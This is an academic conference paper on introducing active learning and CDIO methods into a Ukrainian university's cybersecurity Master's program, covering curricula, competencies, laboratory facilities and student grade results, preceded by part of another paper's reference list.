22. Veeramakali, T., Siva, R., Sivakumar, B., Senthil Mahesh, P.C., Krishnaraj, N.: An intelligent internet of things-based secure healthcare framework using blockchain technology with an optimal deep learning model. J. Supercomput. 77(9), 9576–9596 (2021). https://doi.org/10. 1007/s11227-021-03637-3 23. Thomson, C., Beale, R.: Is blockchain ready for orthopedics? A systematic review. J. Clin. Orthop. Trauma 23(1), 101615 (2021). https://doi.org/10.1016/j.jcot.2021.101615 24. Aujla, G.S., Jindal, A.: A decoupled blockchain approach for edge-envisioned IoT-based healthcare monitoring. IEEE J. Sel. Areas Commun. 39(2), 491–499 (2021). https://doi.org/ 10.1109/JSAC.2020.3020655 25. Alkhateeb, A., Catal, C., Kar, G., Mishra, A.: Hybrid blockchain platforms for the Internet of Things (IoT): a systematic literature review. Sensors 22(4), 1304 (2022). https://doi.org/10. 3390/s22041304 26. Kamruzzaman, M.M., Bingxin, Y., Nazirul, I., Alruwaili, O., Min, W., Alrashdi, I.: Blockchain and fog computing in IoT-driven healthcare services for smart cities. J. Healthcare Eng. 2022(9957888), 1–13 (2022). https://doi.org/10.1155/2022/9957888 27. Gunasekeran, D.V., Tseng, R.M., Tham, Y.C., Wong, T.Y.: Applications of digital health for public health responses to COVID-19: a systematic scoping review of artificial intelligence, telehealth and related technologies. Digit. Med. 4(1), 40 (2021). https://doi.org/10.1038/s41 746-021-00412-9 28. Shamsabadi, A., et al.: Internet of things in the management of chronic diseases during the COVID-19 pandemic: a systematic review. Health Sci. Rep. 5(2), e557 (2022). https://doi. org/10.1002/hsr2.557 29. Hrynzovskyi, A.M., Bielai, S.V., Kernickyi, A.M., Pasichnik, V.I., Vasischev, V.S., Minko, A.V.: Medical social and psychological aspects of assisting the families of the military personnel of Ukraine who performed combat tasks in extreme conditions. Wiadomosci Lekarskie 75(2), 310–317 (2022). https://pubmed.ncbi.nlm.nih.gov/35182141/ 30. Ruggiano, N., et al.: Chatbots to support people with dementia and their caregivers: systematic review of functions and quality. J. Med. Internet Res. 23(6), e25006 (2021). https://doi.org/ 10.2196/25006 31. Oh, Y.J., Zhang, J., Fang, M.L.: A systematic review of artificial intelligence chatbots for promoting physical activity, healthy diet, and weight loss. Int. J. Behav. Nutr. Phys. Activity 18(160) (2021). https://doi.org/10.1186/s12966-021-01224-6 32. Azure IoT Platform: Azure IoT Hub. https://azure.microsoft.com/en-us/services/iot-hub/#ove rview 33. Google Cloud IoT Platform: Google Cloud IoT solutions. https://cloud.google.com/soluti ons/iot 34. AWS IoT Platform: AWS IoT services. https://aws.amazon.com/iot/ 35. IBM Watson™ IoT Platform: IoT solutions. https://www.ibm.com/cloud/internet-of-things 36. Microsoft Cloud for Healthcare: Transform the Healthcare Journey. https://www.microsoft. com/en-us/industry/health/microsoft-cloud-for-healthcare 37. ThingSpeak Platform: ThingSpeak for IoT Projects. https://thingspeak.com/ 38. ScienceSoft Platform: IoT Solutions for Healthcare. https://www.scnsoft.com/services/iot/ medical 39. Rahman, M.A., Hossain, M.S.: An Internet-of-medical-things-enabled edge computing framework for tackling COVID-19. IEEE Internet Things J. 8(21), 15847–15854 (2021). https://doi.org/10.1109/JIOT.2021.3051080 40. Chalyi, A.V., Kryvenko, I.P., Chalyy, K.O.: Synergetic Integration of Traditional and ARContent during Medical Informatics Studies. https://lib.iitta.gov.ua/id/eprint/727353 41. Kryvenko, I.P., Chalyy, K.O.: Providing Authentic Learning in Online Courses by Tools of Augmented and Virtual Reality. https://lib.iitta.gov.ua/id/eprint/730975
The Internet of Medical Things
529
42. Kryvenko, I.P., Chalyy, K.O.: Modern eHealth Technologies and Patient-Centered Applications Usability. https://wiadlek.pl/05-2022 43. Kalashchenko, S.I., Hrynzovskyi, A.M.: Immersion technologies influence on students’ psychophysiological status of the National guard military academy of Ukraine. Ukrayins’kyy zhurnal viys’kovoyi medytsyny 3(1), 60–66 (2022). https://doi.org/10.46847/ujmm.2022. 1(3)-060 44. Health Bot Overview: A managed service purpose-built for development of virtual healthcare assistants. https://docs.microsoft.com/en-us/azure/health-bot/overview
Information and Communication Technology in Higher Education
Implementation of Active Cybersecurity Education in Ukrainian Higher School Volodymyr Buriachok, Nataliia Korshun, Oleksii Zhyltsov, Volodymyr Sokolov(B) , and Pavlo Skladannyi Borys Grinchenko Kyiv University, Kyiv, Ukraine {v.buriachok,n.korshun,o.zhyltsov,v.sokolov, p.skladannyi}@kubg.edu.ua
Abstract. Cybersecurity as a part of information technology requires constant professional development for teachers. Therefore it is indicative of the study of the implementation of active learning methods. The experience of higher technical educational institutions in the countries of the European Union (Germany, France, Sweden, etc.) shows that the introduction of active learning elements and Conceive-Design-Implement-Operate (CDIO) methods dramatically increases student engagement and improves their learning outcomes. The article considers the stages of formation of the process of training specialists in cybersecurity. In addition, the experience of introducing active learning methods into the educational process is presented, and its results are analyzed. The technology of implementation of active learning and the results obtained have been presented concerning training professionals of the 2nd (Master’s) degree for the specialty 125 “Cybersecurity” in Borys Grinchenko Kyiv University. These actions are confirmed by the study results of the average score of graduate students, which has increased by three points from 76.3 to 79.3. Keywords: Active learning · practice-oriented training · Conceive-Design-Implement-Operate · CDIO · cybersecurity
1 Introduction Four world industrial and one information revolution over the past few centuries generated the emergence and formation of information and cyber environment, gave rise to the development of the modern information society, and led to the synthesis of two types of technology – information and telecommunication [1]. However, the world parity issues and relations among nations in the news and cyber environment, unfortunately, remain in such a state that needs further development. It could be explained by the fact that over the last decades, the integral part of internal and external affairs of the majority of countries in the world is the number of information and cyber operations that increasingly affect their economic and social development, making them vital objects of the infrastructure of those countries vulnerable and sensitive to the threats of anthropogenic and technological nature and natural disasters. To begin with the 80s of the last century, among the most significant events of this kind, according to the world community, are such events as [2–8], namely: © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 533–551, 2023. https://doi.org/10.1007/978-3-031-35467-0_32
534
V. Buriachok et al.
The events of June 1982 when the CIA of the USA disabled the Soviet gas pipe “Urengoy-Surgut-Chelyabinsk” using a logical bomb embedded into the software for the automatization of managing technological processes [9]. The events of 1991 when AF/91computer virus, being installed into the printer chip, enabled the US secret services to deactivate the Iraq air defense control system during the operation “Desert Storm” [10]. The events of 2003–2009, when the Slammer virus switched off the systems of monitoring of security in Nuclear Power Plant Davis-Besse in Ohio for 5 h [11]; when a DDoS-attack was launched at the Estonian national geoinformation systems and mass media [12]; when an information attack code-named “Titan shower” affected military contractors in Sandia National Laboratories and Redstone Arsenal while the projects for the development of a fighter-bomber F-35 Lightning II were stolen from LockheedMartin company servers; when the Conficker computer worm damaged French fighters as well as digital systems of ships and submarines of Great Britain Royal fleet and the House of Commons of the British parliament [14]. The events of 2010–2013, when with the aid of targeted malicious software – network computer worms Duqu, Flame i Stuxnet, Gauss, and Sputnik – Inter-State incidents were initiated like spy operations NetTraveler [15] and Red October [16]. The events of 2014–2016, when using an attack at the SCADA systems of Ukraine at Prykarpattyaoblenergo and Kyivoblenergo enterprises, unknown intruders managed to switch off seven substations operating at a voltage of 110 kV and 23 substations operating at a voltage of 35 kV having left 80,000 people without electricity for 6 h; when some offenders with the help of BlackEnergy virus infected one of the working stations at the Boryspil airport [17]. The events of 2017–2018, when a large scale attack Petya.A caused failures in the functioning of Ukrainian State enterprises, establishments, banks, media, etc., among which were the Boryspil airport, Chornobyl NPS, Ukrtelecom, Ukrposhta, Oshadbank, UkrZaliznytsia, and the number of other big enterprises [18]; when a large-scale attack WannaCry led to the leakage of information from office files Excel, Word, PowerPoint and Open Office as well as music and video files, email messages and mail archives, databases files MS SQL and MS Access, graphic files MS Visio, Adobe Photoshop, etc. in more than 150 world countries [19]. This variety and extent of cyber operations, which have recently accompanied the development of humankind, facilitated the search for solutions in terms of the protection of information, that is produced, processed, stored, and disseminated in IT systems and nets (ITCM) and ITCM proper in which such information circulates, from the events connected with security and incidents related to them (see Table 1) [20]. The purpose of this study is to track the results of the implementation of the active learning methodology on the example of a technical specialty (e.g., cybersecurity). Research tasks: 1. Consideration of successive historical challenges in the study of information security. 2. Rapprochement of employers’ expectations and fundamental skills of young professionals in cybersecurity. 3. Formation of the structure of the training program: a list of skills and competencies.
Implementation of Active Cybersecurity Education
535
Table 1. Stages of the development of security systems Stage
Period
Initial 1940s–mid-1950s
Characteristics
Security education aspects
1. Early stage of electronic computer development 2. Primary orientation at physical protection
The issue of security is considered only in military educational institutions
I
mid-1950s–early 1960s 1. Beginning of package processing of the data, which is combined with a program 2. Emergence of input and output devices 3. Orientation at the restriction of access for specialists
Basic approaches to teaching methods of secure data storage are being formed
II
early and mid-1960s
1. Division of programs and data into The foundation of information security is separate segments being laid, becoming widely available in 2. The functioning of electronic computers technical higher educational institutions under multi-task conditions and time division 3. Introduction of security systems for OS 4. Introduction of storage area protection segments
III
mid-1960s–mid-1970s
1. Emergence of file systems and multi-user OS 2. Differentiation of access to resources 3. The development of guaranteed protection of OS
IV
mid and late 1970s
1. Introduction of higher-level services Engineers’ training to maintain rapidly 2. Orientation at the protection of split growing information systems for industry systems and databases and business is being put on stream 3. Splitting up at the security services level
V
1980s
1. The emergence of personal electronic computers 2. Orientation at data protection in personal electronic computers 3. Orientation at data protection in OS 4. Disabling of access to protection mechanisms
Trusted Computer System Evaluation Criteria become the basis for forming secure approaches for creating secure information systems
VI
1990s
1. Emergence of computer networks 2. Introduction of a security model of public systems interaction 3. Introduction of global network security services 4. Security standardization
The formation of local and global information systems leads to many new threats. Educational institutions are actively creating their networks or connecting to existing ones
VII
2000s
1. Introduction of integral systems of security management 2. Introduction of the systems of detecting vulnerabilities and penetrations 3. Standardization of security management 4. Introduction of OS with dynamic change in security policy
The formation of cybersecurity as a fundamental area of research has allowed the formation of narrow specialties that make it possible to protect data, programs, information systems, investigate incidents, etc
Training programs are being actively developed, but information technologies are experiencing an acute shortage of specialists
(continued)
536
V. Buriachok et al. Table 1. (continued)
Stage
Period
Characteristics
Security education aspects
VIII
2010–present
1. Beginning the number of attacks at critical infrastructure 2. Introduction of national cybersecurity agencies 3. Establishing global exchange of information on cyber incidents 4. Establishing cyber police and cyber forces
The rapid change in the technological stack leads to the total obsolescence of approaches, methods, and materials for training specialists. The teacher constantly develops himself and solves practical problems with the students
4. Adapting the current process to the modern challenges of active learning and implementing innovative interaction methods with students. 5. Implementation of a training program on the example of a specific higher education institution. 6. Study of the results of students’ progress and involvement in the educational process.
2 Theoretical Basis of the Research Training high-quality specialists in this specialty will make it possible to develop a capable army of specialists capable of preventing cyber-attacks in Ukraine. The formation of local and global information systems leads to many new threats. Educational institutions are actively creating their networks or connecting to existing ones. The study uses training data (for the last three years) before the implementation of the active learning methodology and the results after the study. In a certain sense, this material is descriptive. The sequence of implementation implies the atomicity of competencies and knowledge synthesis. This study attempts to introduce active learning methods that have proven themselves successfully in European technical schools. For example, in Germany (Technische Hochschule), France (Grande École), and Sweden (Tekniska Högskola), engineering schools operate on very similar principles and differ from liberal arts schools in their practical component. There are several areas of study: • Specialized courses that cover only a list of specific tasks. Such courses allow you to quickly understand a particular technology or approach but do not give a complete picture. Quite expensive training and certification. The courses contain many practical tasks. • Vendor training is usually cheaper but requires paid certification and regular qualifications. The specialist is very dependent on market conditions and vendor stability. Practice only on equipment from one ecosystem, so it is difficult for a specialist to move to an adjacent domain.
Implementation of Active Cybersecurity Education
537
• Classical university education provides an excellent mathematical and algorithmic basis but lags behind modern technologies’ relevance. Training a specialist is expensive, as it takes a long time. The specialist needs some time to adapt to the labor market. As you can see, each of the systems has its drawbacks. Therefore, developing new training approaches is required to obtain high-quality specialists. The basis for the solution to the problem stems from the results of the prediction of the global transformation of competencies within the next 4–5 years, made by the World Economic Forum analysts, the main principles of the Cybersecurity Reference Curriculum, elaborated in 2017 by the Consortium “Partnership for peace” working group [28], Recommendations of the International project ENGENSEC “Educating the Next Generation Experts in Cyber Security: the New EU-recognized Master’s Program’s,” implemented in our country with the support of the European committee in 2013–2016 under the Agreement No. 2013-5084/001-001 on cooperation between Ukraine and the EU (Table 2), international standards like National Science Education Standards, NRC & NAP [29] as well as K-4 and 9–12 “Science and research. The development of student knowledge and skills” [30], and the initiative CDIO Standard 2.1 [31, 32]. According to the international community [25], the skills shortly that will be mainly in demand should be the following: • • • • • • • • • •
Ability to solve complex tasks. Ability of critical thinking. Creativity. Managing people. Coordination and cooperation. Emotional intellect. Decision making. Client orienting. Negotiating. Cognitive flexibility.
The number of necessary competencies formed by state bodies at different levels is shown in Fig. 1.
Fig. 1. Levels of formation of competences
538
V. Buriachok et al. Table 2. Recommendations of the international project ENGENSEC
Course
Previous knowledge
Learning outcomes
Web Security Technologies
Web resources and programming language architecture, protocols for web resources (PHP, SQL, HTML, HTTP, IP, TCP, UDP, Java, JavaScript)
To know existing vulnerable points in web resources and how to deal with them at the stage of development and exploitation, the samples of designing secure web applications
Wireless and Mobile Security Technologies
Leading wireless technologies (Wi-Fi, LTE, Bluetooth, WiMAX, CDMA, GSM, UMTS), principles of channels formation and encryption, wireless protocols
To know vulnerable points and methods of dealing with them in wireless and mobile networks, special network equipment for securing wireless and mobile networks, to be able to detect penetration threats, to design secure wireless systems
Network Security Software Development Technologies
Protocols of transport and network-level of systems OSI and frames structure, programming languages (C++, Java, Assembler), the architecture of operating systems
To know how to use methods and ways of designing and testing software, detection, and elimination of activities that threaten the system’s security (antiviruses, firewalls, sniffers, port scanners, etc.)
Advanced Network and Cloud Security Technologies
Protocol stack OSI (TCP, UDP, IP), network packages, addressing, networks construction principles, network equipment, cloud systems construction principles, cryptography basics
To know the vulnerable points, methods of dealing with them in telecommunication technologies, special network equipment for securing corporate networks, forms of secure data transmission in the insecure environment, and design ensure wired systems
Counteracting Malicious Software (Malware) Technologies
Programming languages (C++, Java, Assembler), operating systems architecture
To conduct a semantic analysis of files, detect malicious software, restore damaged information, model vulnerabilities of security, and use samples of design to secure software
Applied Aspects of Testing for Penetration and Ethical Hacking
Existing web-resources vulnerabilities (SQL-injections, brute force, XSS, etc.), web-resources construction architecture, programming languages, and protocols for web-resources (PHP, SQL, HTML, HTTP, IP, TCP, UDP, Java, JavaScript)
To know methods and ways of testing network resources for the existence of security vulnerabilities; to find the ways of their elimination
Security Incidents Investigation Technologies (Digital Forensic)
—
To know how to organize investigation processes of incidents by the standards ISO 27001, ISO 27035, ISO 27037, ISO 27031, ISO 20000, ISO/IEC TR 18044, NIST SP 800-61, CMU/SEI-2004-TR-015
The higher levels lead to changes at lower ones and, consequently, affect the teaching process. The global criterion which combines basic skills and sub-skills and facilitates the formation of necessary competencies at various levels is active (practice-oriented) learning. Due to this criterion, a close relationship is established between the knowledge, skills, and employers’ requirements. The main principle, in its turn, is the process of conceiving based on the use of designing technologies and readiness for the constant implementing and operating of
Implementation of Active Cybersecurity Education
539
perspective ideas and innovations – CDIO: conceiving, designing, implementing, and operating. During the process of collection of information about Ukrainian Higher Education Institution (HEI) that offer training for the specialty 125 “Cybersecurity,” it has been found out that out of 49 licensed HEI: Only 25 HEI train the specialists of the 2nd (Master’s) level. Only three out of these 25 HEI have corresponding Education-Professional Programs (EPP) of the 2nd (Master’s) program, which is publicly accessible. Only several of EPP in HEI, which are the subject of our analysis, take into account the employers’ requirements for training high-quality Cybersecurity specialists at the Master’s level. Proceeding from this, we would like to point out the primary factors, which have been considered during the process of implementation of active training for the specialty “Cybersecurity” in Borys Grinchenko Kyiv University, namely: The individual nature of assignments is determined by different sets of skills and competencies of applicants since not only Bachelor’s program graduates having undergone corresponding training can apply for the Master’s program but also those graduates with related specialties. It is characterized by the necessity of the subject chosen by the previous student knowledge, skills, and sub-skills; approval of a Master’s thesis plan during the first two months of study since all further research, course papers, and various types of practical training could eventually be the elements of a Master’s thesis. Focus on the result is conditioned by the student being primarily interested in a subject of a Master’s thesis and his orientation at gaining engineering and scientific experience instead of assessment results. It is characterized by: (a) the necessity of the development of experimental models and systems within one of the Master’s courses; (b) the necessity of ensuring transparency of the Master’s thesis results using the preparation of various publications: conference statement abstracts, articles, etc. It is essential to consider the shortage of time for the preparation for the experiment, its conducting and formalization of results, and the process of indexing publications (primarily conference statements, abstracts, and articles) in academic citation databases.
3 Research Results Figure 2 shows the scheme of forming skills in a Master’s EPP, the basis of which is the technology of active learning. The employer determines professional skills (hard skills) and the criteria for forming universal competencies (soft skills). At the first level, an employer determines technical instructions, requirements for the personnel, and the number of specialists. It enables: • At the 2nd level to form technical and personal skills correctly. • At the 3rd level, using the introduction of syllabi, master and reinforce the skills and knowledge gained in active learning. • The 4th and final level of active learning is the employment of graduates. The career of graduates does not necessarily have to be related to the employer who makes a
540
V. Buriachok et al.
request. If this is the case, a specialist will have to compete with all other experienced specialists presently available in the labor market. Among universal soft skills (see Fig. 2), separate blocks are singled out, namely: critical competencies, general competencies (see a detailed description in Table 3), and professional competencies (Table 4). An essential competence includes solving complex tasks and problems in information and cybersecurity and is characterized by the uncertainty of conditions and demands. As a result, all professional competencies and learning outcomes comply with critical competencies.
Fig. 2. Formation of an actual education process
Table 3. List of general competencies (Master’s degree) Index Description GC-1 An ability to master various communicative styles (unofficial, official, and scholarly) in an official and foreign language GC-2 An ability to work in a team, to gain new professional knowledge and practical skills for using them in a professional activity GC-3 An ability to identify problematic aspects in the area of cybersecurity to analyze, evaluate and solve them GC-4 An ability to synthesize new ideas, conduct scientific research, and implement technical developments in a professional area at a corresponding level (for EPP)
Implementation of Active Cybersecurity Education
541
Table 4. List of professional competencies (Master’s degree) Index Description PC-1 An ability to evaluate physical, technological, information, and sociological information and/or cyber environment processes PC-2 An ability to apply mathematical skills, system analysis, and synthesis to solve urgent cyber security systems and data protection problems PC-3 An ability to apply up-to-date information and communication technology to the development of cybersecurity and data protection systems PC-4 An ability to make evaluations and find necessary solutions in cybersecurity systems and data protection under conditions of assumptions and limitations PC-5 An ability to discover vulnerabilities and secure wired and wireless networks, investigate cybersecurity incidents, and counteract malicious software codes PC-6 An ability to secure the security of network and web resources and restore their regular functioning due to failures and breakdowns of various types and origins
Figure 3 presents a structure-logic scheme of formation of two-year Master’s EPP for the specialty “Cybersecurity” based on the recommendations of an International project ENGENSEC “Educating the Next Generation Experts in Cybersecurity: the New EUrecognized Master’s program” as well as the additional introduction of other courses and/or disciplines such as “Mathematical methods of cryptography” and “Methods of formation and analysis of cryptosystems,” practical training and presentation of Master’s thesis.
Fig. 3. Schedule of an educational process
Matching of disciplines and practical training of Master’s program for the specialty “Security of information and communication systems” with general and professional competencies is illustrated in Fig. 4. The relations between the formation of competencies at the 1st (Bachelor’s) level and the 2nd (Master’s) level of higher education could be illustrated based on the example of the course “Technology of security of wireless and mobile networks” (Fig. 5).
542
V. Buriachok et al.
Fig. 4. Matching Master’s disciplines and practical training of EPP “Security of information and communication systems” with corresponding competences
Fig. 5. Relations between competencies at the Bachelor’s and Master’s levels for the course “Technologies of wireless and mobile networks security”
Implementation of Active Cybersecurity Education
543
As can be seen from the picture, a block of Bachelor’s training is indicated in blue. In contrast, the Master’s training block is yellow; indices “b” and “m” stand for Bachelor’s and Master’s competencies correspondingly. As shown in Fig. 5, professional competencies PCm-1, PCm-2, PCm-4, and PCm5 start being formed at the Bachelor’s level in the process of teaching corresponding disciplines. At the Master’s level, further development of these competencies continues. Similar to the Bachelor’s program, this process is ensured by the use of specific disciplines. Practical learning outcomes of the two-year Master’s program are shown in Table 5. In Borys Grinchenko Kyiv University, two big scientific and research centers have been established to serve as physical infrastructure for Bachelor’s and Master’s training for the specialty “Cybersecurity,” one of them being the “Centre of Studying Technologies of Information-communication Systems and Networks Functioning and Security” which includes the “Laboratory of Computer Networks (Cisco)” and the “Laboratory of Information and Communication Systems Security;” the other one being the “Centre of Study of Information Assets Security Technologies” which includes the “Laboratory of Technical and Cryptographic Information Security”; the “Laboratory of Information Assets Security” (its cyber training site structure is shown in Fig. 6), and the “Laboratory of Computer Virology”. In computer classes of the Centers (Fig. 7), various software and hardware are installed, namely: DS Office i DS LifeCycle Management System, information security contour SearchInform (Belarus), the software of network protection from unauthorized access “Loza,” “Gryf,” “Rubizh RSO,” IP-traffic cryptographic protection contour (a company Avtor, Kyiv), antivirus protection stand (a company ESET, Slovakia), key certification center (Institute of Information Technologies, Kharkiv), etc. which enables: • First, to study programming languages of high level (C/C++, Java, JavaScript, PHP, Python), modern mathematical packages (MatLab), and application packages (MathCad), as well as to study the specifics of functioning and security of modern operating systems and databases. • Second, to establish and configure commutators (switches) and routers Cisco in multiprotocol networks, detect and eliminate failures in LAN and WAN networks, increase network productivity and security, and organize work with middle-sized networks. • Third, to organize data search and collection and study the models of its securing, in cloud data storage in particular, to model processes of supporting a necessary security level of data assets, eliminate the consequences of cyberweapon application, and restore normal modes of data objects functioning and cyberinfrastructure. • Fourth, to construct virtual private networks (VPN), secured IP and TCP networks and secured inter-network connections, to build systems of IP-traffic security based on IPsec ideology (RFC 2401), to service users’ public keys certificates, to provide the users with a digital encryption key and data encryption as well as the means of key generation and control, etc. • Fifth, in real-time, to detect incidents of increased complexity and manage them, do data collection, detect anomalies and signs of security policy breach, detect the Zero-Day threat, and protect from ransomware (cyber blackmail).
544
V. Buriachok et al. Table 5. Practical learning outcomes
Index
Description
PLO-1
1. To be able to apply the knowledge of foreign languages to ensure the efficiency of professional communication 2. To diagnose and interpret situations, plan and conduct scientific research, and think critically about theories, principles, methods, and categories in education and professional activity 3. To present knowledge and skills in the theory and practice of ICS in oral and/or written forms for professional and non-professional audiences
PLO-2
1. To identify and formulate urgent scientific problems, generate and integrate new ideas and new knowledge in the area of information and cybersecurity 2. To be able to apply specialized software packages, current information technology 3. To know the vulnerabilities and methods of their use in various telecommunication technologies 4. To know the ways of dealing with these vulnerabilities and specialized network equipment used to secure corporate networks 5. To be able to design secure (with threats taken into account) wired telecommunication systems 6. To know methods of organization of secure data transmission in a non-secure environment
PLO-3
1. To know vulnerabilities and methods of their use in wireless and mobile networks 2. To know how to detect the threats of penetration or perpetrators’ access to such networks 3. To know specialized equipment for securing wireless and mobile networks 4. To be able to design secure (with threats taken into account) wireless networks
PLO-4
To know methods and ways of development and testing of software on detecting and eliminating activities that threaten the security of the system (antiviruses, firewalls, sniffers, port scanners)
PLO-5
1. To know how to conduct file semantic analysis 2. To be able to detect malicious software and files by their structure and behavior 3. To be able to restore damaged data 4. To be able to model software vulnerabilities and to use samples of design for software protection
PLO-6
1. To know existing vulnerabilities of web resources (SQL-injections, brute force, XSS, etc.) and the methods of dealing with them at the development and exploitation stages 2. To know design samples of secure web applications
PLO-7
1. To know methods and ways of testing network resources for security vulnerabilities 2. To know how to find the ways of their elimination
PLO-8
To organize processes of incidents investigated by the standards ISO 27001, ISO 20000, ISO 27035, ISO 27037, ISO 27031, ISO/IEC TR 18044, NIST SP 800–61, CMU/SEI-2004-TR-015
PLO-9
1. To use practical skills of auditing information and cybersecurity, administering and exploiting 2. To design perspective cryptosystems and apply modern technologies of cryptographic data protection in the systems of information and/or cybersecurity
• Sixth, to detect radio-bugging devices, ensure the protection of information from leaking out through technical channels, and control access to information activity objects. • Seventh, to construct the systems of management of information security by the standards of ISO 17799:2005 and ISO 2700, to carry out an independent and regular analysis of risks and manage its results (DS Office 2012), to maintain a necessary security level of enterprise data assets without unnecessary expenses and non-optimal resource exploitation (DS LifeCycle Management System 2012), etc.
Implementation of Active Cybersecurity Education
Fig. 6. Cyber training site structure
Fig. 7. Server equipment (a) and laboratory complex (b) of the center
545
546
V. Buriachok et al.
4 Results of Active Learning Implementation Table 6 shows results obtained by Borys Grinchenko Kyiv University in the period from 2017 to 2019 for seven main disciplines of professional training at the 2nd (Master’s) higher education level for the specialty 125 “Cyber Security,” the branch of knowledge being 12 “Information Technology.” The availability of an integrated curriculum, stages of design and implementation, technical platforms, and a practical component of active learning and the state of inservice training of teachers for each of these disciplines serve as the leading indicators of success in this study. Sign “+” in Table 6 refers to the requirements of the CDIO initiative, which we have implemented in full, sign “–” indicates the conditions of the CDIO initiative, which we have implemented partly, and sign “±” refers to the aspects postponed to the next year and concerns those disciplines of the Master’s program that will be introduced only in the following academic year. Table 6. Key performance indicators as required by CDIO Course
Comprehen-sive syllabus
Development and implementation
Technical platforms
Active learning
In-service teacher training
Web-resources security technologies
+
+
+
+
+
Security + technologies for wireless and mobile networks
+
±
+
+
Network security + software development and testing technologies
+
+
±
±
Network infrastructure security technologies
+
±
+
±
±
Technologies for counteracting malicious code
±
±
+
–
+
Applied aspects of penetration testing and ethical hacking
±
–
+
±
+
Investigation of security incidents technologies
±
–
+
–
±
More significant results were obtained by the students of State University of Telecommunications and Borys Grinchenko Kyiv University, who studied the discipline “Wireless and Mobile Network Security Technologies.” The selection of students who studied this discipline before its introduction into the educational process of Active Learning technologies was 45 people, while after its implementation their number grew up to 57.
Implementation of Active Cybersecurity Education
547
To determine possible effects from the implementation of active learning in the curriculum of the educational process of Ukrainian HEI, we have analyzed students’ success assessment range (Fig. 8). The ECTS alphabetical scale has been used instead of the 100-point scale (see Table 7) to average the results obtained. Table 7. ECTS grading scale used in this study Grade
Score
Grade
Score
A
≥90
D
≥69
B
≥82
E
≥60
C
≥75
F
≥35
Fig. 8. Students’ success (1) before and (2) after implementation of active learning
As can be seen from the obtained results (Fig. 8), the distribution of grades becomes homogeneous: the distribution curve before the introduction of Active Learning is close to the Laplace distribution, but after its implementation, it gets similar to the χ2 distribution with 4 degrees of freedom. The average grade increases by 3 points (from 76.3 to 79.3). Because the assessment of our students does not fully reflect their academic performance, the quality of Active Learning implementation for the specialty 125 “Cyber Security” of the branch of knowledge 12 “Information Technology,” is confirmed using external testing at Cisco Networking Academy. For this purpose, the closest to the discipline “Wireless and Mobile Network Security: IoT Fundamentals: IoT Security” (version 1.0) experimental courses have been selected. Students have been given one week to familiarize themselves with the course materials and to take a corresponding exam. The passing score of the Cisco Success Course is set at 75. All Cyber Security Master’s Degree students at Borys Grinchenko Kyiv University have completed the task,
548
V. Buriachok et al.
received passing grades and corresponding certificates, which correlated with the results obtained earlier [34].
5 Approbation and Utilization of Research Outcomes The experience of implementation of the Active Learning Method has been presented and discussed at scientific and practical events and conferences, shown in Table 8. Table 8. ECTS grading scale used in this study Date
The title of the report and the speaker
11/15/2018 Implementation of World Methods of Active Learning in 125 Cyber Security Master’s Degree Program
Event and place
Speaker
Workshop “The Educational Aspect of Cyber Security”, Kyiv [35]
V. Sokolov, PhD
11/29/2018 Introduction of Active Learning Cyber Security & Intelligent Technologies into the Educational Manufacturing Conference, Process at Borys Grinchenko Kyiv Changsha, China [36] University
V. Buriachok, DSc, Prof
12/01/2018 Active Learning: Implementation and Promotion
Project Contest for Student Action O. Babich, 1st -year student of 125 Participants: Student Leadership “Cyber Security” Competency Development Program, British Council, Ramada Encore, Kyiv [37]
12/08/2018 Implementation of practice-oriented technologies training in the educational process at KUBG, 125 “Cybersecurity”
V Annual International Forum of Information Security Experts “Information Security: Current Trends – 2018,” Kyiv [38, 39]
V. Buriachok, DSc, Prof
01/26/2019 Implementation of Active Learning in the Master’s Program on Cybersecurity
II International Conference on Computer Science, Engineering and Education Applications (ICCSEEA’ 2019), Kyiv [34]
V. Sokolov, PhD
During the presentation of the experience and materials of courses with active learning, shortcomings have been identified, which are eliminated in further development. For example, part-time students typically face a critical shortcoming in practical classes. Active learning allows to restructure the busy session time into control of independent work and exciting and productive work. And the practice of early involvement of students gives excellent results in preparing for bachelor’s theses. In the middle of the third year, students understand what they would like to do. Therefore, the topic of the work becomes detailed with practical results and prototypes.
6 Conclusions and Future Research Cybersecurity as a part of information technology requires constant professional development for teachers. Therefore it is indicative of the study of the implementation of active learning methods. Referring to Borys Grinchenko Kyiv University as an example,
Implementation of Active Cybersecurity Education
549
the paper highlights one of the possible approaches to forming a competence model based on the technology of Active Learning. This approach can be the foundation for the development of educational programs and curricula for the high-quality training of professionals of the 2nd (Master’s) level of education for the specialty 125 “Cyber Security” of the branch of knowledge 12 “Information Technology” in the higher institutions of Ukraine. This approach will enable: To train highly qualified professionals capable of effectively fulfilling the tasks of innovative character in telecommunications and information technologies, pedagogy, and methodology of higher education. To cover information and cybersecurity issues, especially in Kyiv (including managing the IT and technical security of information) and Ukraine. To ensure an appropriate level of interaction with higher educational institutions of the world’s leading countries in improving information and cybersecurity specialist training. This training will allow to coordinate actions of the state and business structures to exercise competent and qualified specialists in information and cybersecurity, etc. Besides, it should first contribute to the reliable and efficient functioning of the state and commercial sectors of Ukraine’s national security and economy, enhancing our state’s cybersecurity and defense capability. Secondly, it should increase the attractiveness of this specialty for both state and commercial institutions and agencies, providing information and cybersecurity services to individuals and various industrial and banking structures in Kyiv. These actions are confirmed by the study of the results of the average score of graduate students, which has increased by three points from 76.3 to 79.3. Cybersecurity as a part of information technology requires constant professional development for teachers. Therefore it is indicative of the study of the implementation of active learning methods. According to the study’s results, students’ active involvement in solving applied problems in the learning process increases academic performance and student interest. Further research is intended to focus on a more thorough study of interdisciplinary links, which will provide students with a high-quality educational and professional program and the latter’s extension to all levels of cybersecurity training, including pre-service and in-service training. Acknowledgments. The authors are grateful to EU ENGENSEC Project Manager Anders Carlson from the Chair of Computer Science and Engineering (Department of Technology of Institute of Technology in Blekinge, Karlskrona, Sweden) for the assistance in developing the Master’s Program in Cyber Security [40].
References 1. Cohen, F.: Computer viruses theory and experiments. Comput. Secur. 6(1), 22–35 (1987) 2. Alizar, A.: HP Information Security Report 2013. http://xakep.ru/2014/02/04/61990/ 3. McAfee LLC. McAfee Labs Threats Report. https://www.mcafee.com/enterprise/en-us/ass ets/reports/rp-quarterly-threats-dec-2018.pdf 4. International Telecommunication Union: Security in Telecommunications and Information Technology. https://www.itu.int/dms_pub/itu-t/opb/tut/T-TUT-SEC-2015-PDF-E.pdf
550
V. Buriachok et al.
